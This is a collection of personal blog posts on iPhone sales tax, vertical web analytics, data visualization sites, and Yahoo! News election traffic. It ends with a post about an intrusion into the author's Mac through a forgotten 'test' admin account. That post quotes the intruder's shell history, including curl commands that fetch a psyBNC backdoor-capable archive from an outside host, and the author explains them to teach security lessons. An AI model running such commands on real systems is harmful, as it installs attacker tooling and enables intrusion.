iPhone Sales Tax is on the Unsubsidized Price

So the iPhone 3G S is lust-worthy, if for no other reason than the 3MP autofocus camera and the speed increase. There’s plenty of news about how AT&T is lagging – no MMS (coming), no tethering (maybe coming), giving smaller discounts to iPhone 3G customers than to new customers.

I’m not eligible for the $299 price because I’ve given Apple too much business, thus AT&T has had to subsidize me twice (read: I bought an original iPhone and a year later bought an iPhone 3G). So I get the option to wait until October to get the $299 price, or pay $499 now. I’ll wait, thanks. Maybe for whatever Apple announces next summer.

But Heidi never upgraded to the iPhone 3G, so she’s eligible for the $299 price. Great, let’s put that puppy in the cart. Whoa, look at the tax!

AT&T iPhone tax

Yep, the tax is calculated as 9.5% (welcome to California) on the full $699 retail price of the phone. AT&T doesn’t subsidize that, and I couldn’t find it disclosed anywhere. I asked the Apple Store live chat — they were useless (told me the tax was on the $499 price) until I (duh) backed into the number on my own.

So, Apple’s ads should say the 32GB iPhone costs $699, minus an “instant rebate” that depends on how much AT&T has already subsidized you. But giving the real price wouldn’t sound as lust-worthy, would it?

Update July 18:At the online Apple Store, there’s small print at the bottom of the buy iPhone page that says

In CA, MA, and RI, sales tax is collected on the unbundled price of iPhone.

The CA regulation that requires Apple to collect this tax is documented at http://www.boe.ca.gov/pdf/pub120.pdf. What Apple doing isn’t illegal — just a bit misleading.

iPhone Sales Tax is on the Unsubsidized Price

Is This the Future of Web Analytics?

Long ago I mentioned what I called “vertical analytics” and how blogs may be the next analytics frontier. Fast forward to the present, and blog analytics are “been there, done that.” (The product demo I saw in a hotel room at SES never saw the light of day; the originator went on to other things – and remains active in “general” web analytics.)

bandmetrics-badge.pngI still think vertical analytics is bound to happen. Witness Atlanta-based Indie Music, whose service Band Metrics — “Analytics For The Music Industryâ„¢”, scored angel financing back in November. More than one press report about the financing used a variant of the phrase “Google Analytics of the music industry.”

Compared with some of the graybeards of Business Intelligence, the Web Analytics “industry” has not yet left adolescence. But I think many of the lessons learned in the greater web analytics field, combined with more powerful machines and a greater “popular culture” around number crunching, are going to lead to analytics for very specialized fields. At a minimum, it might move us away from generic tools that look at the Web to tools that have specific knowledge of a particular business — kinda like a specific solution for scheduling & billing for dentists vs. bringing in Oracle Applications and Accenture. What can be bad about that?

Could this be a new analytics growth opportunity, or perhaps just a land grab? Here’s a thought experiment: check out XXXanalytics.com (where XXX is whatever interesting business you can think of) and see if it’s already taken. I tried a half-dozen while composing this post and I was surprised how many were already claimed…

(Interestingly, XXXanalytics.com itself is not taken, nor is dentistanalytics.com)

Is This the Future of Web Analytics?

New Visualization Sites, Tools and Ideas

If there’s one thing better than having lots of data, it’s probably visualizing it.

I’ve been coming across new sites and new ideas for visualizing data, and thought I’d mention a few.

One of the things I love about the New York Times is their smart visualizations. The interactive graphic A Year of Heavy Losses was a huge hit last fall (even if the data was scary as hell) as the financial meltdown was unfolding. Treemaps can be difficult to understand, but this one nailed it.

screenshot_06.gif

Even the Times’ day-to-day infographics can be a pleasure to look at. Did you know that the NYT has a Visualization Lab where you can make your own visualizations? It uses the many eyes technology from IBM.

FlowingData explores many visual aspects of data. If you haven’t seen their visualization of Watching the Growth of Walmart Across America, (which uses the Modest Maps library) I highly recommend it — but the site has a lot more to discover.

walmart-spread.gif

Jeff Clark over at Neoformix continues to produce thought-provoking visualizations, many full of beautiful insight, like this contrast of two speeches, and some, like his visualization of Obama’s victory speech, are just plain “hang on the wall” beautiful (politics aside). I spend way too much time at Neoformix. Rather than single out one post, check out his Neoformix Review 2008 and see if you’re not intrigued. Jeff also links to other interesting visualization sites and projects.

supertuesday.gif

Infographics should tell a story. Seeing a map of the US with red and blue states doesn’t really give the full scale of how the election went. Mark Newman, however, does a good job showing how using the geographic area is the wrong way to visualize the data, and coming up with better suggestions.

cartogram.gif

Tim Showers’ visualization discussions are worth checking out. I particularly liked his post on the challenges of visualizing multi-level data .

multipie.gif

The TheStatBot does various dives into data that doesn’t normally get the spotlight, such as what post-processing software gets used on Flickr. Here’s a Twitter Wordle they did of Leo Laporte’s various tweets:

leo-wordle.gif

And .. if you like infoclutter (and we all do, sometimes, right?), check out this dashboard!

Finally, if you’ve made it this far: not really a data visualization, but a fascinating time-lapse movie of a four seasons in one 40-second video.

screenshot_02.gif

Have you seen other interesting visualization ideas?

New Visualization Sites, Tools and Ideas

In 2009

More fit / Less pizza

More photographs / Less pictures

More Tinderbox and OmniFocus / Less productivity pr0n

More action / Less analysis

More blog posts / Less excuses

More technology / Less meetings

 

May you have appropriately more and less in 2009.

In 2009

Graphing Yahoo! News Elections Traffic

Just a quick graph that shows daily page views to Yahoo! News. The green line shows the week before the US elections, while the week of the elections is in blue.Y! News PVs, US Elections

This comes from our internal numbers; for “competitive reasons” I removed the legend indicating volume — but you can see the site was much busier than the previous week. Uniques, PVs, and PVs per unique all were way up.

TechCrunch showed some data from Hitwise on market share of visits for Nov 4. It’s a little strange that Yahoo! wasn’t listed in the TechCrunch graph, even though Yahoo! placed first overall. Also interesting that the Drudge Report was so high. Here are the top 10 .. for more, see Media Life Magazine .

Hitwise ranking of election sites

Graphing Yahoo! News Elections Traffic

The Break-in

The Scary Door by musicalwds

I am so ashamed.

I was once a system & network manager, so I know about things like bad passwords and scanning software. Later, I built firewalls for Sun. Lately I’ve lectured on the importance of locking down your web analytics data, and the precautions you need to take. So imagine my shock to discover that my home desktop Mac was broken into. Yep. I had enabled remote logins through my firewall, which is innocent enough, but during a fit of debugging some USB problems, I set up new user named “test” with a password of .. you guessed it. I remember at the time thinking “don’t pick ‘test’ as a user name, and certainly don’t use it as the password” but I was in a hurry and I did it anyway. I finished my debugging, but forgot about the account.

Oh, and of course, I set it up with full administrator privileges.

Tonight I’m poking through my log files (I’m still debugging for the source of this USB error on my system, it’s driving me nuts), and I notice that some scanning software came by today, trying to log into zillions of accounts. I was smugly scrolling through the list of user names it was trying until I got to “test” and … it didn’t log in. It didn’t know the password. I first thought, holy crap, I left that account enabled. Then I thought, how could it not guess the password?

The reason: because somebody else had, three days ago. And changed it.

I brought up a Terminal window, and typed “last test” which gives me a list of the previous logins. Sure enough, some fine program/human had logged in to my system three days ago, and stayed for 1 minute. So I went to the “test” home directory, where I conveniently found a list of what happened when they logged in:

1. w
2. passwd
3. uname -a
4. exit
5. cd /var/tmp
6. mkdir " "
7. cd " "
8. curl -O geocities.com/myhael_ilie/psyd,tar.gz
9. curl -O geocities.com/myhael_ilie/psyd,tar.gz
10. exit

Translation:

  1. See who’s on.
  2. Change the password for user “test”.
  3. See what kind of system this is.
  4. Logout.
  5. Go to a folder commonly used for temporary files.
  6. Create a folder named ” ” (just a single space).
  7. Change to that folder.
  8. Download a file from the web.
  9. Try the download again.
  10. Give up, and log out.

So why did the curl commands fail? It’s because I use Little Snitch, which asks my permission every time a random command tries to access the Internet. Since I wasn’t at the computer at the time, I never gave my OK, and Little Snitch prevented the ‘curl’ from working. The person would have seen this:

curl: (7) Failed to connect to 66.218.77.68: Host is down

So what was in psyd,tar.gz? Well, actually it’s a typo. The real name doesn’t have a comma in it, but the person who logged in didn’t notice the mistake because of the “host is down” message. I grabbed the correct file and took a look at it. It is psyBNC, an “IRC bouncer”, but can be used to install backdoors and other nastiness. The file contains the complete source code, as well as a fully-functioning Mac executable.

Fortunately, that’s the end of the story. Several lessons here, ones which I’ve told others far too many times:

  1. Do what you can to prevent break-ins.
  2. Log everything so you can figure out how the inevitable break-in happened.
  3. Convenience is often at the expense of security

I was incredibly lucky. A simple sudo bash would have given this person root access, and they could have erased everything on my system, or worse. In fact, they could have, and then erased all traces of what they did, but I have enough logging and checks to know that they didn’t do anything but what’s described above.

I humbly admit all of this in the hope that you can learn from my near miss.

And yes, I removed the “test” account.

The Break-in